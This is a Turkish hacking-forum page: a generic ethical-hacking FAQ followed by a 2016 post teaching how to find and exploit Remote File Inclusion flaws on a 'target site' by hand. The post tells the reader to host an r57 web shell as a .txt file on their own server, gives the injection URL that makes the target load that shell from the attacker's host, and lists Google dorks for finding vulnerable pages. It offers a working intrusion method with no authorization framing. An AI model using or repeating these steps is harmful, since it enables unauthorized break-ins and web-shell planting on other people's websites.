Hedef site üzerinde elle rfi açık bulmak

Q: Türkiye'nin En Büyük Hack Forumu SpyHackerz mı?

SpyHackerz, Türkiye'nin en aktif ve en köklü siber güvenlik forum topluluklarından biridir. Binlerce üyesiyle etik hacking, siber güvenlik ve penetrasyon testi konularında Türkiye'nin lider platformlarından biri olmaya devam etmektedir.

Q: Üye olmak ücretli mi?

Hayır, SpyHackerz'e üye olmak tamamen ücretsizdir. Kayıt olarak topluluğa katılabilir, içeriklere erişebilir ve forum tartışmalarına katılabilirsiniz.

Q: Ethical hacking nedir?

Etik hacking, sistemlerin güvenlik açıklarını yetkili bir şekilde test etme ve raporlama sürecidir. Etik hackerlar, kötü niyetli saldırganlardan önce açıkları bularak kurumların güvenliğini artırmalarına yardımcı olur.

Q: Siber güvenlik öğrenmek için nereden başlamalıyım?

Siber güvenliğe başlamak için önce temel ağ ve işletim sistemi bilgisi edinmeniz önerilir. Ardından SpyHackerz forumundaki eğitim kategorilerini takip edebilir, CTF yarışmalarına katılabilir ve TryHackMe ile HackTheBox üzerinde pratik yapabilirsiniz.

Q: Nasıl etik hacker olurum?

Etik hacker olmak için Linux, ağ protokolleri ve programlama temellerini öğrenmekle başlayabilirsiniz. CEH, OSCP gibi sertifikalar kariyerinizi güçlendirir. SpyHackerz topluluğu bu yolculukta size rehberlik edecek binlerce kaynak ve deneyimli üye sunmaktadır.

CaLVINaToR_KG · 2 Ara 2016

1-) Hedef Site Üzerinde Manuel(Elle) Olarak RFI Açığı Taramak.

Şimdi size tekrar hedef sitemiz olan www.xxx.com üzerinden manuel açık tarayamayı anlatacağım.

Sitemizde bir id değeri ararız.Buldugumuz id değerinde RFI açığı tararız.Nasılmı?

www.xxx.com/sayfa.php?id=1

Gerekli olan bir şey daha belirteyim.Kendi hostunuza atılmış bir txt uzantılı shell..Oda www.sitemiz.com/r57shell.txt?

Şimdi hedef sitemizdeki id değerinin sonundaki rakam/harf/karakter herneyse siliyoruz ve kendi sitemizdeki txt uzantılı shell adresini yazıyoruz.

www.xxx.com/sayfa.php?id=http://sitemiz.com/r57shell.txt?

ekrana r57shellimiz yansır ise bir RFI Açığı bulmuşsunuz demektir.Bir Screnn ile anlatayım bunu; (Shell yansıması)

Bu resim otomatik olarak küçültülmüştür. Resmin tam görünümü için tıklayın. Orjinal resim boyutu 993x838.

Evet.Bu şekilde bir Shell yansıması olur ise hedef siteye shell sokulmuş demektir.

RFI Açığının Bir Dorku Varmıdır?

RFI Açığının belirli bir dorku yoktur.PHP ve ASP vs vs sayfalarda olabilir.Şimdi ben buraya binlerce dork yazabilirim ama zamanımız kısıtlı bu yüzden bir kaç örnek dork vereyim.

inurl:"page?id="

inurl:"open?id="

inurl:"go?id="

Hedef site üzerinde elle rfi açık bulmak

Daha fazla seçenek

CaLVINaToR_KG

About Us & Legal Notice